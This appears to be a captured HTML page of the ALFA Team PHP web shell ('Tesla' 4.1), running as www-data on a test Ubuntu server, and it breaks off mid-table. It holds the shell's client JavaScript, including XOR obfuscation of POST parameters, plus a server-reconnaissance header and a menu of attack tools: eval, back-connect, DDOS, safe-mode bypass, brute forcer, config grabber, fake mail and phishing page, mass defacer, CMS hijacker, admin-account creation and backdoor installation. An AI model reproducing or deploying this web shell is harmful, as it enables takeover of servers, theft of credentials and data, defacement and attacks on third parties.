class='editor-icon'>"+loadType(a,i,e)+"</div><div class='editor-file-name'>"+a+"</div></div><div class='history-close' onClick='removeHistory(\""+e+"\");'>X</div>",o.className="file-holder"+l,o.addEventListener("mouseover",function(){setEditorTitle(e,"over"),this.childNodes[1].style.opacity="1"}),o.addEventListener("mouseout",function(){setEditorTitle(e,"out"),this.childNodes[1].style.opacity="0"});var r=d.getElementsByClassName("history-list")[0];r.insertBefore(o,r.firstChild)}function loadType(e,a,t){"none"==a&&_Ajax(d.URL,"a="+alfab64("checkfiletype")+"&path="+alfab64(editor_files[t].pwd)+"&arg="+alfab64(editor_files[t].file),function(e){$(t).innerHTML="<div class='editor-icon'>"+loadType(editor_files[t].file,e,t)+"</div><div class='editor-file-name'>"+editor_files[t].file+"</div>",editor_files[t].type=e});if("file"==a){a=(a=e.split("."))[a.length-1].toLowerCase();-1==["json","ppt","pptx","xls","xlsx","msi","config","cgi","pm","c","cpp","cs","java","aspx","asp","db","ttf","eot","woff","woff2","woff","conf","log","apk","cab","bz2","tgz","dmg","izo","jar","7z","iso","rar","bat","sh","alfa","gz","tar","php","php4","php5","phtml","html","xhtml","shtml","htm","zip","png","jpg","jpeg","gif","bmp","ico","txt","js","rb","py","xml","css","sql","htaccess","pl","ini","dll","exe","mp3","mp4","m4a","mov","flv","swf","mkv","avi","wmv","mpg","mpeg","dat","pdf","3gp","doc","docx","docm"].indexOf(a)&&(a="notfound")}else a="folder";return'<img src="http://solevisible.com/icons/{type}" width="30" height="30">'.replace("{type}",a+".png")}function updateFileEditor(e,a){var t="id_"+e,i="id_chmode_"+e,l="id_rename_"+e,o="id_touch_"+e,r="id_edit_"+e,n="id_download_"+e,d="id_delete_"+e,s=$(t).getAttribute("ftype");"folder"==s&&(s="dir"),"file"==s?($(t).innerHTML=a,$(t).setAttribute("href","#action=fileman&path="+c_+"/"+a),$(t).setAttribute("onclick","editor('"+a+"','auto','','','','file')"),$(r).setAttribute("onclick","editor('"+a+"','edit','','','','"+s+"')"),$(n).setAttribute("onclick","g('FilesTools',null,'"+a+"', 'download')")):($(t).innerHTML="<b>| "+a+" |</b>",$(t).setAttribute("onclick","g('FilesMan', '"+c_+"/"+a+"')")),$(i).setAttribute("onclick","editor('"+a+"','chmod','','','','"+s+"')"),$(l).setAttribute("onclick","editor('"+a+"','rename','','','','"+s+"')"),$(o).setAttribute("onclick","editor('"+a+"','touch','','','','"+s+"')"),$(d).setAttribute("onclick","var chk = confirm('Are You Sure For Delete # "+a+" # ?'); chk ? g('FilesMan',null,'delete', '"+a+"') : '';"),$(t).setAttribute("fname",a)}function updateDirsEditor(e,a){var t=d.mf.c.value+"/",i=editor_files[e].pwd+"/"+a+"/",l=editor_files[e].pwd+"/"+editor_files[e].file+"/";for(var o in i=i.replace(/\/\//g,"/"),l=l.replace(/\/\//g,"/"),-1!=(t=t.replace(/\/\//g,"/")).search(i)&&(initDir(t.replace(i,l)),d.mf.c.value=t.replace(i,l)),editor_files){var r=editor_files[o].pwd+"/";-1!=(r=r.replace(/\/\//g,"/")).search(i)&&(editor_files[o].pwd=r.replace(i,l))}updateCookieEditor()}function updateCookieEditor(){setCookie("alfa_history_files",btoa(JSON.stringify(editor_files)),2012)}function setEditorTitle(e,a){if("out"==a&&""!=editor_current_file){var t=d.querySelector(".editor-tab-name.editor-tab-active");e=null!=t?t.getAttribute("opt_id").replace("editor_source_","file_"):editor_current_file}editor_files[e]&&(d.getElementsByClassName("editor-path")[0].innerHTML=(editor_files[e].pwd+"/"+editor_files[e].file).replace(/\/\//g,"/"))}function removeHistory(e){delete editor_files[e],$(e)&&$(e).parentNode.parentNode.removeChild($(e).parentNode);var a=d.getElementsByClassName("filestools")[0];a&&a.getAttribute("fid")==e&&(a.outerHTML=""),editor_current_file==e&&(editor_current_file=""),updateCookieEditor()}function getRandom(e){for(var a="",t="0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ",i=void 0===e?20:e;i>0;--i)a+=t[Math.floor(Math.random()*t.length)];return a}function reopen(e){var a=e.getAttribute("id"),t=editor_files[a].pwd,i=editor_files[a].file,l="editor_source_"+a.replace("file_","");null==$(l)?editor(i,"auto","",t,a):editorTabController(l,!0)}function copyToClipboard(e){e=e.getAttribute("ace_id");var a=alfa_ace_editors.editor[e].selection.toJSON();alfa_ace_editors.editor[e].selectAll(),alfa_ace_editors.editor[e].focus(),document.execCommand("copy"),alfa_ace_editors.editor[e].selection.fromJSON(a),alfaShowNotification("text copied","Editor")}function encrypt(e,a){if(null==a||a.length<=0)return null;e=alfab64(e,!0),a=alfab64(a,!0);for(var t="",i="",l=0;l<e.length;)for(var o=0;o<a.length&&(t=e.charCodeAt(l)^a.charCodeAt(o),i+=String.fromCharCode(t),!(++l>=e.length));o++);return alfab64(i,!0)}function reloadSetting(e){return alfaloader(alfa_before_do_action_id,"block"),_Ajax(d.URL,"a="+alfab64("settings")+"&alfa1="+alfab64(e.protect.value)+"&alfa2="+alfab64(e.lgpage.value)+"&alfa3="+alfab64(e.username.value)+"&alfa4="+alfab64(e.password.value)+"&alfa5="+alfab64(">>")+"&alfa6="+alfab64(e.icon.value)+"&alfa7="+alfab64(e.post_encrypt.value)+"&alfa8="+alfab64("main")+"&alfa9="+alfab64(e.cgi_api.value)+"&c="+alfab64(c_)+"&ajax="+alfab64("true"),function(e,a){loadPopUpOpTions(a,e),evalJS(e),alfaloader(a,"none")},!1,alfa_before_do_action_id),alfa_before_do_action_id="",0==e.e.value&&1==e.protect.value&&setTimeout("location.reload()",1e3),e.s.value!=e.icon.value&&setTimeout("location.reload()",1e3),!1}function reloadColors(e){var a={};void 0===e?d.querySelectorAll(".colors_input").forEach(function(e){var t=e.getAttribute("target").replace(".","");a[t]=e.value}):a=e;var t=$("use_default_color").checked?"1":"0";_Ajax(d.URL,"a="+alfab64("settings")+"&alfa1="+alfab64(JSON.stringify(a))+"&alfa2="+alfab64(">>")+"&alfa3="+alfab64(t)+"&alfa8="+alfab64("color")+"&c="+alfab64(c_)+"&ajax="+alfab64("true"),function(e){evalJS(e)},!0)}function alfab64(e,a){return void 0!==a||0==post_encryption_mode?window.btoa(unescape(encodeURIComponent(e))):encrypt(e,"")}function evalCss(e){var a=document.createElement("style");a.styleSheet?a.styleSheet.cssText=e:a.appendChild(document.createTextNode(e)),d.getElementsByTagName("head")[0].appendChild(a)}function colorHandlerKey(e){setTimeout(function(a){colorHandler(e)},200)}function colorHandler(e){var a=e.getAttribute("target"),t=e.getAttribute("multi"),l=a.indexOf(":hover");if(t){var o=JSON.parse(atob(t)),r="";for(i in o.multi_selector)r+=i+"{"+o.multi_selector[i].replace(/{color}/g,e.value)+"}";evalCss(r)}-1==l||t?($("input_"+a.replace(".","")).value=e.value,$("gui_"+a.replace(".","")).value=e.value,".header_values"==a&&(a=".header,.header_values"),d.querySelectorAll(a).forEach(function(a){a.style.color=e.value})):($("input_"+a.replace(".","")).value=e.value,$("gui_"+a.replace(".","")).value=e.value,evalCss(a+"{color: "+e.value+";}"))}function importConfig(e){var a=e.target,t=new FileReader;t.onload=function(){var e=t.result;try{reloadColors(JSON.parse(e))}catch(e){alert("Config is invalid...!")}$("importFileBtn").value=""},t.readAsText(a.files[0])}function checkBox(e){var a=alfa_current_fm_id,t=e.checked;d.querySelectorAll("#filesman_holder_"+a+" form[name=files] input[type=checkbox]").forEach(function(e){e.checked=t})}function runcgi(e){if($("cgiframe").style.height="unset",d.querySelector("#cgiloader-minimized .minimized-text").innerHTML="Cgi Shell",d.querySelector("#cgiloader .opt-title").innerHTML="Cgi Shell",cgi_is_minimized&&cgi_lang==e&&(showEditor("cgiloader"),0==php_temrinal_using_cgi))return!1;php_temrinal_using_cgi=!1,_Ajax(d.URL,"a="+alfab64("cgishell")+"&alfa1="+alfab64(e)+"&ajax="+alfab64("true"),function(a){d.body.style.overflow="hidden",$("cgiloader").style.display="block",d.querySelector("#cgiframe .terminal-tabs").innerHTML="",d.querySelector("#cgiframe .terminal-contents").innerHTML=a,cgi_lang=e,cgi_is_minimized&&($("cgiloader-minimized").setAttribute("class","minimized-hide"),setTimeout(function(){$("cgiloader").removeAttribute("class"),is_minimized&&($("editor-minimized").style.top="30%")},1e3))})}Element.prototype.appendAfter=function(e){e.parentNode.insertBefore(this,e.nextSibling)};
</script>
</head><body bgcolor="#000000" leftmargin="0" topmargin="0" marginwidth="0" marginheight="0" style="overflow: visible;"><form style="display:none;" id="dlForm" action="" target="_blank" method="post">
<input type="hidden" name="a" value="dlfile">
<input type="hidden" name="c" value="">
<input type="hidden" name="file" value="">
</form>
<input type="file" style="display:none;" id="importFileBtn" onchange="importConfig(event);">
<div id="a_loader" style="display: none;"><img src="http://solevisible.com/images/loader.svg"></div>


<div id="up_bar_holder"></div>
<div class="whole">
<form method="post" name="mf" style="display:none;">
<input type="hidden" name="a" value="FilesMan">
<input type="hidden" name="c" value="/var/www/html/"><input type="hidden" name="alfa1" value=""><input type="hidden" name="alfa2" value=""><input type="hidden" name="alfa3" value=""><input type="hidden" name="alfa4" value=""><input type="hidden" name="alfa5" value=""><input type="hidden" name="alfa6" value=""><input type="hidden" name="alfa7" value=""><input type="hidden" name="alfa8" value=""><input type="hidden" name="alfa9" value=""><input type="hidden" name="alfa10" value=""><input type="hidden" name="charset" value="Windows-1251">
</form>
<div id="hidden_sh"><a class="alert_green" target="_blank" href="?solevisible"><span style="color:#42ff59;">Tesla</span><br><small>Version: <span class="hidden_shell_version">4.1</span></small></a></div>
<div class="header"><table width="100%" border="0">
<tbody><tr>
<td width="3%"><span class="header_vars">Uname:</span></td>
<td colspan="2"><span class="header_values" id="header_uname">Linux osboxes 5.15.0-60-generic #66-Ubuntu SMP Fri Jan 20 14:29:49 UTC 2023 x86_64</span></td>
</tr>
<tr>
<td><span class="header_vars">User:</span></td>
<td><span class="header_values" id="header_userid">33 [ www-data ] </span><span class="header_vars"> Group: </span><span class="header_values" id="header_groupid">33 [ www-data ]</span> </td>
<td width="12%" rowspan="8"><img style="border-radius:100px;" width="300" height="170" alt="alfa team 2012" draggable="false" src="http://solevisible.com/images/alfa-iran.png"></td>
</tr>
<tr>
<td><span class="header_vars">PHP:</span></td>
<td><b>7.2.34-37+ubuntu22.04.1+deb.sury.org+1 </b><span class="header_vars"> Safe Mode: <span class="header_on">OFF</span></span></td>
</tr>
<tr>
<td><span class="header_vars">ServerIP:</span></td>
<td><b>::1</b><div style="display:inline;display:none;" class="flag-holder"></div> <span class="header_vars">Your IP:</span><b> ::1</b><div style="display:inline;display:none;" class="flag-holder"></div></td>
</tr>
<tr>
<td width="3%"><span class="header_vars">DateTime:</span></td>
<td colspan="2"><b>2023-02-12 23:15:53</b></td>
</tr>
<tr>
<td><span class="header_vars">Domains:</span></td>
<td width="76%"><span class="header_values" id="header_domains">Cant Read [ /etc/named.conf ]</span></td>
</tr>
<tr>
<td height="16"><span class="header_vars">HDD:</span></td>
<td><span class="header_vars">Total:</span><b>216.08 GB </b><span class="header_vars">Free:</span><b>180.77 GB [83%]</b></td>
</tr><tr><td height="18" colspan="2"><span class="header_vars">Useful : </span><span class="header_values" style="margin-left: 4px;">gcc</span><span class="header_values" style="margin-left: 4px;">cc</span><span class="header_values" style="margin-left: 4px;">ld</span><span class="header_values" style="margin-left: 4px;">make</span><span class="header_values" style="margin-left: 4px;">php</span><span class="header_values" style="margin-left: 4px;">perl</span><span class="header_values" style="margin-left: 4px;">tar</span><span class="header_values" style="margin-left: 4px;">gzip</span><span class="header_values" style="margin-left: 4px;">nc</span></td>
</tr>
<tr>
<td height="0" colspan="2"><span class="header_vars">Downloader: </span><span class="header_values" style="margin-left: 4px;">wget</span><span class="header_values" style="margin-left: 4px;">curl</span><span class="header_values" style="margin-left: 4px;">lwp-mirror</span></td>
</tr><tr>
<td height="16" colspan="2"><span class="header_vars">Disable Functions: </span><b><span class="header_show_all">All Functions Accessible</span></b></td>
</tr>
<tr>
<td height="16" colspan="2"><span class="header_vars">CURL :</span><span class="header_on"> ON </span> | <span class="header_vars">SSH2 : </span><span class="header_off"> OFF </span> | <span class="header_vars">Magic Quotes : </span><span class="header_off">OFF</span> | <span class="header_vars"> MySQL :</span><span class="header_off"> OFF </span> | <span class="header_vars">MSSQL :</span><span class="header_off"> OFF </span> | <span class="header_vars"> PostgreSQL :</span><span class="header_off"> OFF </span> | <span class="header_vars"> Oracle :</span><span class="header_off"> OFF </span> | <span class="header_vars"> CGI :</span> <span class="header_off" id="header_cgishell">OFF</span></td><td width="15%"><div id="alfa_solevisible"><center><a href="https://t.me/solevisible" target="_blank"><span><font class="solevisible-text" color="#0F0">Sole Sad &amp; Invisible</font></span></a></center></div></td>
</tr>
<tr>
<td height="11" colspan="3"><span class="header_vars">Open_basedir :</span><b><span class="header_none"> NONE </span></b> | <span class="header_vars">Safe_mode_exec_dir :</span><b><span class="header_none"> NONE </span></b> | <span class="header_vars"> Safe_mode_include_dir :</span><span class="header_none"> NONE </span></td>
</tr>
<tr>
<td height="11"><span class="header_vars">SoftWare: </span></td>
<td colspan="2"><b>Apache/2.4.52 (Ubuntu)</b></td>
</tr><tr>
<td height="12"><span class="header_vars">PWD:</span></td>
<td colspan="2"><span id="header_cwd"><a class="header_pwd" onclick="g(&quot;FilesMan&quot;,&quot;/&quot;)" path="/" href="#action=fileman&amp;path=/">/</a><a class="header_pwd" onclick="g(&quot;FilesMan&quot;,&quot;/var/&quot;)" path="/var/" href="#action=fileman&amp;path=/var/">var/</a><a class="header_pwd" onclick="g(&quot;FilesMan&quot;,&quot;/var/www/&quot;)" path="/var/www/" href="#action=fileman&amp;path=/var/www/">www/</a><a class="header_pwd" onclick="g(&quot;FilesMan&quot;,&quot;/var/www/html/&quot;)" path="/var/www/html/" href="#action=fileman&amp;path=/var/www/html/">html/</a> </span><a href="#action=fileman&amp;path=/var/www/html" onclick="g('FilesMan','/var/www/html','','','')"><span class="home_shell">[ Home Shell ]</span> </a></td>
</tr>
</tbody></table>
</div>
<div id="meunlist">
<ul>
<li><a id="menu_opt_proc" href="#action=options&amp;path=/var/www/html/&amp;opt=proc" class="menu_options" onclick="alfa_can_add_opt=true;this.href='#action=options&amp;path='+c_+'&amp;opt=proc';g('proc',null,'','','');d.querySelector('.opt-title').innerHTML=this.innerHTML;">Process</a></li>
<li><a id="menu_opt_phpeval" href="#action=options&amp;path=/var/www/html/&amp;opt=phpeval" class="menu_options" onclick="alfa_can_add_opt=true;this.href='#action=options&amp;path='+c_+'&amp;opt=phpeval';g('phpeval',null,'','','');d.querySelector('.opt-title').innerHTML=this.innerHTML;">Eval</a></li>
<li><a id="menu_opt_sql" href="#action=options&amp;path=/var/www/html/&amp;opt=sql" class="menu_options" onclick="alfa_can_add_opt=true;this.href='#action=options&amp;path='+c_+'&amp;opt=sql';g('sql',null,'','','');d.querySelector('.opt-title').innerHTML=this.innerHTML;">SQL Manager</a></li>
<li><a id="menu_opt_dumper" href="#action=options&amp;path=/var/www/html/&amp;opt=dumper" class="menu_options" onclick="alfa_can_add_opt=true;this.href='#action=options&amp;path='+c_+'&amp;opt=dumper';g('dumper',null,'','','');d.querySelector('.opt-title').innerHTML=this.innerHTML;">Database Dumper</a></li>
<li><a id="menu_opt_coldumper" href="#action=options&amp;path=/var/www/html/&amp;opt=coldumper" class="menu_options" onclick="alfa_can_add_opt=true;this.href='#action=options&amp;path='+c_+'&amp;opt=coldumper';g('coldumper',null,'','','');d.querySelector('.opt-title').innerHTML=this.innerHTML;">Column Dumper</a></li>
<li><a id="menu_opt_hash" href="#action=options&amp;path=/var/www/html/&amp;opt=hash" class="menu_options" onclick="alfa_can_add_opt=true;this.href='#action=options&amp;path='+c_+'&amp;opt=hash';g('hash',null,'','','');d.querySelector('.opt-title').innerHTML=this.innerHTML;">En-Decoder</a></li>
<li><a id="menu_opt_connect" href="#action=options&amp;path=/var/www/html/&amp;opt=connect" class="menu_options" onclick="alfa_can_add_opt=true;this.href='#action=options&amp;path='+c_+'&amp;opt=connect';g('connect',null,'','','');d.querySelector('.opt-title').innerHTML=this.innerHTML;">BC</a></li>
<li><a id="menu_opt_zoneh" href="#action=options&amp;path=/var/www/html/&amp;opt=zoneh" class="menu_options" onclick="alfa_can_add_opt=true;this.href='#action=options&amp;path='+c_+'&amp;opt=zoneh';g('zoneh',null,'','','');d.querySelector('.opt-title').innerHTML=this.innerHTML;">ZONE-H</a></li>
<li><a id="menu_opt_dos" href="#action=options&amp;path=/var/www/html/&amp;opt=dos" class="menu_options" onclick="alfa_can_add_opt=true;this.href='#action=options&amp;path='+c_+'&amp;opt=dos';g('dos',null,'','','');d.querySelector('.opt-title').innerHTML=this.innerHTML;">DDOS</a></li>
<li><a id="menu_opt_safe" href="#action=options&amp;path=/var/www/html/&amp;opt=safe" class="menu_options" onclick="alfa_can_add_opt=true;this.href='#action=options&amp;path='+c_+'&amp;opt=safe';g('safe',null,'','','');d.querySelector('.opt-title').innerHTML=this.innerHTML;">ByPasser</a></li>
<li><a id="menu_opt_cgishell" href="#action=options&amp;path=/var/www/html/&amp;opt=cgishell" class="menu_options" onclick="alfa_can_add_opt=true;this.href='#action=options&amp;path='+c_+'&amp;opt=cgishell';g('cgishell',null,'','','');d.querySelector('.opt-title').innerHTML=this.innerHTML;">Cgi Shell</a></li>
<li><a id="menu_opt_ssiShell" href="#action=options&amp;path=/var/www/html/&amp;opt=ssiShell" class="menu_options" onclick="alfa_can_add_opt=true;this.href='#action=options&amp;path='+c_+'&amp;opt=ssiShell';g('ssiShell',null,'','','');d.querySelector('.opt-title').innerHTML=this.innerHTML;">SSI SHELL</a></li>
<li><a id="menu_opt_cpcrack" href="#action=options&amp;path=/var/www/html/&amp;opt=cpcrack" class="menu_options" onclick="alfa_can_add_opt=true;this.href='#action=options&amp;path='+c_+'&amp;opt=cpcrack';g('cpcrack',null,'','','');d.querySelector('.opt-title').innerHTML=this.innerHTML;">Hash Tools</a></li>
<li><a id="menu_opt_portscanner" href="#action=options&amp;path=/var/www/html/&amp;opt=portscanner" class="menu_options" onclick="alfa_can_add_opt=true;this.href='#action=options&amp;path='+c_+'&amp;opt=portscanner';g('portscanner',null,'','','');d.querySelector('.opt-title').innerHTML=this.innerHTML;">Port Scaner</a></li>
<li><a id="menu_opt_basedir" href="#action=options&amp;path=/var/www/html/&amp;opt=basedir" class="menu_options" onclick="alfa_can_add_opt=true;this.href='#action=options&amp;path='+c_+'&amp;opt=basedir';g('basedir',null,'','','');d.querySelector('.opt-title').innerHTML=this.innerHTML;">Open BaseDir</a></li>
<li><a id="menu_opt_mail" href="#action=options&amp;path=/var/www/html/&amp;opt=mail" class="menu_options" onclick="alfa_can_add_opt=true;this.href='#action=options&amp;path='+c_+'&amp;opt=mail';g('mail',null,'','','');d.querySelector('.opt-title').innerHTML=this.innerHTML;">Fake Mail</a></li>
<li><a id="menu_opt_ziper" href="#action=options&amp;path=/var/www/html/&amp;opt=ziper" class="menu_options" onclick="alfa_can_add_opt=true;this.href='#action=options&amp;path='+c_+'&amp;opt=ziper';g('ziper',null,'','','');d.querySelector('.opt-title').innerHTML=this.innerHTML;">Compressor</a></li>
<li><a id="menu_opt_deziper" href="#action=options&amp;path=/var/www/html/&amp;opt=deziper" class="menu_options" onclick="alfa_can_add_opt=true;this.href='#action=options&amp;path='+c_+'&amp;opt=deziper';g('deziper',null,'','','');d.querySelector('.opt-title').innerHTML=this.innerHTML;">DeCompressor</a></li>
<li><a id="menu_opt_IndexChanger" href="#action=options&amp;path=/var/www/html/&amp;opt=IndexChanger" class="menu_options" onclick="alfa_can_add_opt=true;this.href='#action=options&amp;path='+c_+'&amp;opt=IndexChanger';g('IndexChanger',null,'','','');d.querySelector('.opt-title').innerHTML=this.innerHTML;">Index Changer</a></li>
<li><a id="menu_opt_pwchanger" href="#action=options&amp;path=/var/www/html/&amp;opt=pwchanger" class="menu_options" onclick="alfa_can_add_opt=true;this.href='#action=options&amp;path='+c_+'&amp;opt=pwchanger';g('pwchanger',null,'','','');d.querySelector('.opt-title').innerHTML=this.innerHTML;">Add New Admin</a></li>
<li><a id="menu_opt_ShellInjectors" href="#action=options&amp;path=/var/www/html/&amp;opt=ShellInjectors" class="menu_options" onclick="alfa_can_add_opt=true;this.href='#action=options&amp;path='+c_+'&amp;opt=ShellInjectors';g('ShellInjectors',null,'','','');d.querySelector('.opt-title').innerHTML=this.innerHTML;">Shell Injectors</a></li>
<li><a id="menu_opt_php2xml" href="#action=options&amp;path=/var/www/html/&amp;opt=php2xml" class="menu_options" onclick="alfa_can_add_opt=true;this.href='#action=options&amp;path='+c_+'&amp;opt=php2xml';g('php2xml',null,'','','');d.querySelector('.opt-title').innerHTML=this.innerHTML;">PHP2XML</a></li>
<li><a id="menu_opt_cloudflare" href="#action=options&amp;path=/var/www/html/&amp;opt=cloudflare" class="menu_options" onclick="alfa_can_add_opt=true;this.href='#action=options&amp;path='+c_+'&amp;opt=cloudflare';g('cloudflare',null,'','','');d.querySelector('.opt-title').innerHTML=this.innerHTML;">CloudFlare</a></li>
<li><a id="menu_opt_Whmcs" href="#action=options&amp;path=/var/www/html/&amp;opt=Whmcs" class="menu_options" onclick="alfa_can_add_opt=true;this.href='#action=options&amp;path='+c_+'&amp;opt=Whmcs';g('Whmcs',null,'','','');d.querySelector('.opt-title').innerHTML=this.innerHTML;">Whmcs DeCoder</a></li>
<li><a id="menu_opt_symlink" href="#action=options&amp;path=/var/www/html/&amp;opt=symlink" class="menu_options" onclick="alfa_can_add_opt=true;this.href='#action=options&amp;path='+c_+'&amp;opt=symlink';g('symlink',null,'','','');d.querySelector('.opt-title').innerHTML=this.innerHTML;">Symlink</a></li>
<li><a id="menu_opt_MassDefacer" href="#action=options&amp;path=/var/www/html/&amp;opt=MassDefacer" class="menu_options" onclick="alfa_can_add_opt=true;this.href='#action=options&amp;path='+c_+'&amp;opt=MassDefacer';g('MassDefacer',null,'','','');d.querySelector('.opt-title').innerHTML=this.innerHTML;">Mass Defacer</a></li>
<li><a id="menu_opt_Crackers" href="#action=options&amp;path=/var/www/html/&amp;opt=Crackers" class="menu_options" onclick="alfa_can_add_opt=true;this.href='#action=options&amp;path='+c_+'&amp;opt=Crackers';g('Crackers',null,'','','');d.querySelector('.opt-title').innerHTML=this.innerHTML;">BruteForcer</a></li>
<li><a id="menu_opt_searcher" href="#action=options&amp;path=/var/www/html/&amp;opt=searcher" class="menu_options" onclick="alfa_can_add_opt=true;this.href='#action=options&amp;path='+c_+'&amp;opt=searcher';g('searcher',null,'','','');d.querySelector('.opt-title').innerHTML=this.innerHTML;">Searcher</a></li>
<li><a id="menu_opt_config_grabber" href="#action=options&amp;path=/var/www/html/&amp;opt=config_grabber" class="menu_options" onclick="alfa_can_add_opt=true;this.href='#action=options&amp;path='+c_+'&amp;opt=config_grabber';g('config_grabber',null,'','','');d.querySelector('.opt-title').innerHTML=this.innerHTML;">Config Grabber</a></li>
<li><a id="menu_opt_fakepage" href="#action=options&amp;path=/var/www/html/&amp;opt=fakepage" class="menu_options" onclick="alfa_can_add_opt=true;this.href='#action=options&amp;path='+c_+'&amp;opt=fakepage';g('fakepage',null,'','','');d.querySelector('.opt-title').innerHTML=this.innerHTML;">Fake Page</a></li>
<li><a id="menu_opt_archive_manager" href="#action=options&amp;path=/var/www/html/&amp;opt=archive_manager" class="menu_options" onclick="alfa_can_add_opt=true;this.href='#action=options&amp;path='+c_+'&amp;opt=archive_manager';g('archive_manager',null,'','','');d.querySelector('.opt-title').innerHTML=this.innerHTML;">Archive Manager</a></li>
<li><a id="menu_opt_cmshijacker" href="#action=options&amp;path=/var/www/html/&amp;opt=cmshijacker" class="menu_options" onclick="alfa_can_add_opt=true;this.href='#action=options&amp;path='+c_+'&amp;opt=cmshijacker';g('cmshijacker',null,'','','');d.querySelector('.opt-title').innerHTML=this.innerHTML;">CMS Hijacker</a></li>
<li><a id="menu_opt_remotedl" href="#action=options&amp;path=/var/www/html/&amp;opt=remotedl" class="menu_options" onclick="alfa_can_add_opt=true;this.href='#action=options&amp;path='+c_+'&amp;opt=remotedl';g('remotedl',null,'','','');d.querySelector('.opt-title').innerHTML=this.innerHTML;">Remote Upload</a></li>
<li><a id="menu_opt_inbackdoor" href="#action=options&amp;path=/var/www/html/&amp;opt=inbackdoor" class="menu_options" onclick="alfa_can_add_opt=true;this.href='#action=options&amp;path='+c_+'&amp;opt=inbackdoor';g('inbackdoor',null,'','','');d.querySelector('.opt-title').innerHTML=this.innerHTML;">Install BackDoor</a></li>
<li><a id="menu_opt_whois" href="#action=options&amp;path=/var/www/html/&amp;opt=whois" class="menu_options" onclick="alfa_can_add_opt=true;this.href='#action=options&amp;path='+c_+'&amp;opt=whois';g('whois',null,'','','');d.querySelector('.opt-title').innerHTML=this.innerHTML;">Whois</a></li>
<li><a id="menu_opt_selfrm" href="#action=options&amp;path=/var/www/html/&amp;opt=selfrm" class="menu_options" onclick="alfa_can_add_opt=true;this.href='#action=options&amp;path='+c_+'&amp;opt=selfrm';g('selfrm',null,'','','');d.querySelector('.opt-title').innerHTML=this.innerHTML;">Remove Shell</a></li>
</ul><div style="text-align: center;padding: 6px;"><a id="menu_opt_settings" href="#action=options&amp;path=/var/www/html/&amp;opt=settings" class="menu_options" onclick="alfa_can_add_opt=true;this.href='#action=options&amp;path='+c_+'&amp;opt=settings';g('settings',null,'','','');d.querySelector('.opt-title').innerHTML=this.innerHTML;">Alfa Settings</a><a style="display:none;" id="menu_opt_market" href="#action=options&amp;path=/var/www/html/&amp;opt=market" class="menu_options" onclick="alfa_can_add_opt=true;this.href='#action=options&amp;path='+c_+'&amp;opt=market';g('market',null,'','','');d.querySelector('.opt-title').innerHTML=this.innerHTML;"><span class="alfa_plus">Alfa market</span></a><a id="menu_opt_aboutus" href="#action=options&amp;path=/var/www/html/&amp;opt=aboutus" class="menu_options" onclick="alfa_can_add_opt=true;this.href='#action=options&amp;path='+c_+'&amp;opt=aboutus';g('aboutus',null,'','','');d.querySelector('.opt-title').innerHTML=this.innerHTML;">About Us</a></div></div><div id="filesman_tabs"><div onmouseover="alfaFilesmanTabShowTitle(this,event);" onmouseout="alfaFilesmanTabHideTitle(this,event);" fm_counter="1" path="/var/www/html/" fm_id="1" id="filesman_tab_1" class="filesman_tab filesman-tab-active" onclick="filesmanTabController(this);"><img class="folder-tab-icon" src="http://solevisible.com/icons/menu/folder2.svg"> <span>html</span></div><div style="display:inline-block;" id="filesman_tabs_child"></div><div id="filesman_new_tab" class="filesman_tab" style="background: maroon;" onclick="alfaFilesManNewTab(c_,'/',1);">New Tab +</div></div><script>alfa1_=alfa2_=alfa3_=""</script><div style="position: relative; min-height: 0px;" fm_id="1" id="filesman_holder_1" class="ajaxarea filesman-active-content"> <script>alfa1_=alfa2_=alfa3_=""</script><div><div class="filters-holder"><span>Filter: </span><input style="color:#25ff00;" autocomplete="off" type="text" id="regex-filter" name="name-filter" onkeydown="doFilterName(this);"><span style="margin-left:10px">Sort By: </span><select name="sort_files" onchange="sortBySelectedValue(this,'alfa_sort_by');" style="color:#25ff00;"><option value="name" selected="">Name</option><option value="size">Size</option><option value="modify">Modify</option></select><span style="margin-left:10px">Direction: </span><select name="direction_filesman" onchange="sortBySelectedValue(this,'alfa_filesman_direction')" style="color:#25ff00;"><option value="asc" selected="">Ascending</option><option value="desc">Descending</option></select><span style="margin-left:10px;"> limit: </span><input style="text-align:center;width: 40px;color:#25ff00;" type="text" name="limited_number" value="0" oninput="this.value=this.value.replace(/[^0-9]/g,'');setCookie('alfa_limited_files', this.value, 2012);"><span style="margin-left:10px;">Files Count: <b style="color:#25ff00;">4</b></span></div><div class="header"><form onsubmit="fc(this);return false;" name="files" method="post"><table id="filemanager_table" width="100%" class="main" cellspacing="0" cellpadding="2"><tbody><tr><th width="13px"><div class="myCheckbox" style="padding-left:0px;"><input type="checkbox" id="mchk28761" onclick="checkBox(this);" class="chkbx"><label for="mchk28761"></label></div></th><th>Name</th><th>Size</th><th>Modify</th><th>Owner/Group</th><th>Permissions</th><th>Actions</th></tr><tr class="fmanager-row" id="tr_row_0"><td><div class="myCheckbox"><input type="checkbox" name="f[]" value=".." class="chkbx" id="checkbox_287610"><label for="checkbox_287610"></label></div></td><td id="td_row_0"><img src="http://solevisible.com/icons/back.png" width="30" height="30"><div style="position:relative;display:inline-block;bottom:12px;"><a row="0" id="id_0" class="main_name" onclick="g('FilesMan','/var/www');" href="#action=fileman&amp;path=/var/www" fname=".." ftype="folder" path="/var/www/html/" opt_title=""><b>| .. |</b></a></div></td><td><span style="font-weight:unset;" class="main_size">dir</span></td><td><span style="font-weight:unset;" class="main_modify">2023-02-12 23:15:52</span></td><td><span style="font-weight:unset;" class="main_owner_group">root/root</span></td><td><a id="id_chmode_0" href="javascript:void(0)" onclick="editor('..','chmod','','','','dir')"><span style="font-weight:unset;" class="main_green_perm">0777</span><span style="font-weight:unset;" class="beetween_perms"> &gt;&gt; </span><span style="font-weight:unset;" class="main_green_perm">d​r​w​x​r​w​x​r​w​x​</span></a></td><td><a id="id_rename_0" title="Rename" class="actions" href="javascript:void(0);" onclick="editor('..', 'rename','','','','dir')">R</a> <a id="id_touch_0" title="Modify Datetime" class="actions" href="javascript:void(0);" onclick="editor('..', 'touch','','','','dir')">T</a><a id="id_delete_0" title="Delete" class="actions" href="javascript:void(0);" onclick="var chk = confirm('Are You Sure For Delete # .. # ?'); chk ? g('FilesMan',null,'delete', '..') : '';"> X </a></td></tr><tr class="fmanager-row" id="tr_row_1"><td><div class="myCheckbox"><input type="checkbox" name="f[]" value="ALFA_DATA" class="chkbx" id="checkbox_287611"><label for="checkbox_287611"></label></div></td><td id="td_row_1"><img src="http://solevisible.com/icons/folder.png" width="30" height="30"><div 